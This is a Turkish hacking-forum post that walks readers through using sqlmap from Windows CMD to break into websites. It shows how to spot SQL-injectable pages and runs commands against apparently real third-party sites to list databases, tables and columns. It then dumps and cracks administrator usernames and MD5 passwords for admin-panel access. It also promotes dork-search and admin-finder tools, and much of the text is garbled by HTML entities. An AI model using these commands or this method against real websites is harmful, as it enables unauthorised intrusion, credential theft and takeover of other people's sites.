URI:
   DIR Return Create A Forum - Home
       ---------------------------------------------------------
       cyberturkis
  HTML https://cybertukis.createaforum.com
       ---------------------------------------------------------
       *****************************************************
   DIR Return to: General Discussion
       *****************************************************
       #Post#: 5--------------------------------------------------
       SQLMAP İle SQL İnjection Hack [Windows CMD Üzerinden]
       / Veteran 7
   DIR By: Gramenyo
       Date: January 27, 2019, 2:24 pm
       ---------------------------------------------------------
       + Python 2.7 adlı setup ile Python kuruyoruz +
       + sqlmap adlı dosyayı direkt Yerel Disk C'ye
       atıyoruz (yani c:\ dizininde olsun) +
       + İntelli Tamper 2.7 adlı program site
       dosyalarını verir admin paneli bulmak için
       kullanırız bunu +
       + Safe3 adlı program çok sağlam SQL İnjection
       taraması yapar sitede +
       Gerekli Dosyaları İndirmek İçin
       Tıklayınız
       Sorun yaşayanlar SQLMAP ve Python'u orjinal sitelerinden
       indirebilirler ;
       sqlmap: automatic SQL injection and database takeover tool
  HTML https://www.python.org/download/releases/2.7/
       Adım 1 : SQLMAP'ı CMD İle
       Çalıştırma
       Yukarıdakileri yaptıktan sonra Başlat'tan CMD
       konsolunu açalım ve konsol "C:" dizinine gelene kadar
       şu kodu yazalım ;
       Kod:
       cd..
       Resim yeniden boyutlandırıldı, orjinalini görmek
       için tıklayın.
       Konsol C:\ dizinine geldikten sonrada şu kodu yazalım
       ;
       Kod:
       cd sqlmap
       Resim yeniden boyutlandırıldı, orjinalini görmek
       için tıklayın.
       Bu adımlarıda yaparsak SQLMAP'ı
       çalıştırmış oluruz.
       Adım 2 : SQL Açıklı Site Bulmak
       + Sitelerin bazı sayfalarında , blogların
       paylaşımlarında bir id değeri olur
       örneğin "page.php?id=18" gibi.
       + Örnek Site : Welcome to the DockGuard website
       + Yukarıda verdiğim siteye girip sondaki ıd
       değerinin sonuna " ' " yani tek tırnak işareti
       koyduğunuzda aşağıdaki gibi ;
       Kod:
  HTML http://www.dockguard.co.uk/page.php?id=18'
       Şu hatayı alacaksınız ;
       Kod:
       You have an error in your SQL syntax; check the manual that
       corresponds to your MariaDB server version for the right syntax
       to use near ''18''' at line 1
       Bu ve benzeri hata metinleri sitede sql açığı
       olduğuna dair en basit belirtilerdir.
       Adım 3 : SQL Açıklı Siteyi Ele Geçirmek
       (Veritabanını Çekmek)
       Adım 3.1 - Sitenin Veritabanı İsimlerini Çekme
       (Database)
       SQLMAP'te sitenin veritabanı isimlerini çekmek için şu
       kodu kullanırız ;
       Kod:
       sqlmap.py -u
  HTML http://hedefsite.com...aciklibolum
       ?id=--dbs
       Yani biz açıklı olarak bulduğumuz herhangi bir
       siteyi çekmek için şu şekilde yazacağız ;
       Kod:
       sqlmap.py -u
  HTML http://www.seaofstories.com/title.php?id=5193--dbs
       Şimdi işleme geçelim cmdye kodumuzu yazalım ENTER
       tuşuna basalım
       Resim yeniden boyutlandırıldı, orjinalini görmek
       için tıklayın.
       ENTER tuşuna bastığımızda işleme
       geçiyor SQLMAP'ımız ve aşağıdaki
       resimde kırmızı ile bir kısım
       işaretledim sonuna dikkat ederseniz [Y/n] yazıyor yani
       Yes ? No ? diye soruyor bize öyle kısımlarda "y"
       yazıp ENTER tuşuna basıyoruz
       Tespiti yapıyor bize açık olduğunu söylüyor ve
       yine "y" yazıp ENTER tuşuna basıp devam ediyoruz
       sonucunda veritabanı bilgilerini çekiyor
       aşağıdaki gibi
       Resim yeniden boyutlandırıldı, orjinalini görmek
       için tıklayın.
       Adım 3.2 - Veritabanı Tablolarını Çekmek
       SQLMAP'te sitenin tablolarını çekmek için şu kodu
       kullanırız ;
       [IMG]
  HTML http://sqlmap.py
       -u
  HTML http://hedefurl.comVeritaban
       ı_Adı --tables[/img]
       Yani biz yukarıda bulduğumuz sitenin
       tablolarını çekmek için şu şekilde
       yazacağız ;
       Kod:
       sqlmap.py -u
  HTML http://www.seaofstories.com/title.php?id=5193seaofstories_app<br
       />--tables
       Not : "information_schema" adl&#305; veritaban&#305; ile
       i&#351;imiz yok bizim i&#351;imiz "seaofstories_app" adl&#305;
       veritaban&#305; ile. A&#351;a&#287;&#305;daki gibi kodumuzu
       yaz&#305; enter'a bast&#305;&#287;&#305;m&#305;zda bize tablo
       isimlerini verecektir
       Resim yeniden boyutland&#305;r&#305;ld&#305;, orjinalini görmek
       için t&#305;klay&#305;n.
       &#304;&#351;lem bitti&#287;inde bize tablo isimlerini verecektir
       biz orda i&#351;imize yarayan&#305; tespit edece&#287;iz yani
       örnek olarak "Administrator" tablosunu buldu diyelim
       Administrator tablosunun kolonlar&#305;n&#305; çekece&#287;iz.
       Ad&#305;m 3.3 - Veritaban&#305; Tablolalar&#305;n&#305;n
       Kolonlar&#305;n&#305; Çekmek
       SQLMAP'te tablo kolonlar&#305;n&#305; çekmek için &#351;u kodu
       kullan&#305;r&#305;z ;
       Kod:
       sqlmap.py -u
  HTML http://hedefurl.com
       -D Veritaban&#305;_Ad&#305; -T
       Tablo_Ad&#305; --columns
       Yani yukar&#305;daki sitemizin Administrator tablosunun
       kolonlar&#305;n&#305; çekmek için &#351;u &#351;ekilde
       yazaca&#287;&#305;z kodlar&#305; ;
       Kod:
       sqlmap.py -u
  HTML http://www.seaofstories.com/title.php?id=5193-D<br
       />seaofstories_app -T Administrators --columns
       Bu &#351;ekilde kodumuzu yaz&#305;p ENTER tu&#351;una
       bast&#305;&#287;&#305;m&#305;zda bize o tablonun
       kolonlar&#305;n&#305; çekecektir i&#351;lem s&#305;ras&#305;nda
       yine [Y/N] ? diye sorarsa "y" diyip Enter bas&#305;n.
       Resim yeniden boyutland&#305;r&#305;ld&#305;, orjinalini görmek
       için t&#305;klay&#305;n.
       Gördü&#287;ünüz gibi kolonlar&#305; çekti &#351;imdi s&#305;ra
       geldi son i&#351;leme bize panele girmek için "Username" ve
       "Password" kolonlar&#305;ndaki &#305;d ve &#351;ifreler gerekli
       bunun için 4. ad&#305;ma gidiyoruz.
       Ad&#305;m 3.4 - Kolonlardaki Verileri (Username & Password)
       Çekme
       SQLMAP'te kolonlardaki verileri çekmek için &#351;u kodu
       kullan&#305;r&#305;z ;
       Kod:
       sqlmap.py -u
  HTML http://hedefurl.com
       -D Veritaban&#305;_Ad&#305; -T
       Tablo_Ad&#305; -C Kolon_Ad&#305; --dump
       Yani yukar&#305;daki sitemizin password kolonlar&#305;ndaki
       verilerini çekmek için &#351;u &#351;ekilde yazaca&#287;&#305;z
       kodlar&#305;
       Kod:
       sqlmap.py -u
  HTML http://www.seaofstories.com/title.php?id=5193-D<br
       />seaofstories_app -T Administrators -C password --dump
       Bu &#351;ekilde kodumuzu yaz&#305;p ENTER tu&#351;una
       bast&#305;&#287;&#305;m&#305;zda bize admin &#351;ifrelerini
       çekecektir i&#351;lem s&#305;ras&#305;nda yine [Y/N] ? diye
       sorarsa "y" diyip Enter bas&#305;n.
       Yukar&#305;da gördü&#287;ünüz gibi MD5 &#351;ifreyi tespit etti
       ve üstte k&#305;rm&#305;z&#305; ile i&#351;aretledi&#287;im
       yerlerde bize sorular sordu "y" yaz&#305;p enter tu&#351;una
       bast&#305;k di&#287;erindede wordlist
       kullan&#305;ls&#305;nm&#305; diye sordu MD5 i k&#305;rmak için
       orda direkt "ENTER" tu&#351;una bast&#305;k her&#351;eyi
       detayl&#305; &#351;ekilde i&#351;aretledim ve altta
       k&#305;rm&#305;z&#305; ile i&#351;aretledi&#287;im yerde
       &#351;ifrenin k&#305;r&#305;lm&#305;&#351; halini bize verdi.
       Not : Ayn&#305; &#351;ekilde "username" adl&#305; kolonu çekip
       admin giri&#351; &#305;dlerine ula&#351;&#305;rs&#305;n&#305;z
       ayn&#305; &#351;ekilde oldu&#287;u için onu detayl&#305;
       göstermedim onun kodunu yazarkende bu &#351;ekilde
       yazacaks&#305;n&#305;z ;
       Kod:
       sqlmap.py -u
  HTML http://www.seaofstories.com/title.php?id=5193-D<br
       />seaofstories_app -T Administrators -C username --dump
       Yard&#305;mc&#305; Olabilecek Yaz&#305;l&#305;mlar
       Veteran Dork Studio 3 FINAL - Dork Yard&#305;mc&#305;
       Program&#305;
       Veteran SQLMAP Helper - SQLMAP Kod Yard&#305;mc&#305;
       Program&#305;
       V E T E R A N 7
       Not : Konu bana aittir geçmi&#351;te aç&#305;lan bir konuydu
       silinmi&#351;ti,tekrardan derleyip konuyu açt&#305;m ilk
       görsellerde k&#305;rm&#305;z&#305; çizili alanlarda
       bilgisayar&#305;n kullan&#305;c&#305; ad&#305; olarak ismim
       soyismim göründü&#287;ünden ötürü sansür
       uygulanm&#305;&#351;t&#305;r.
       *****************************************************
       Page 1 of 1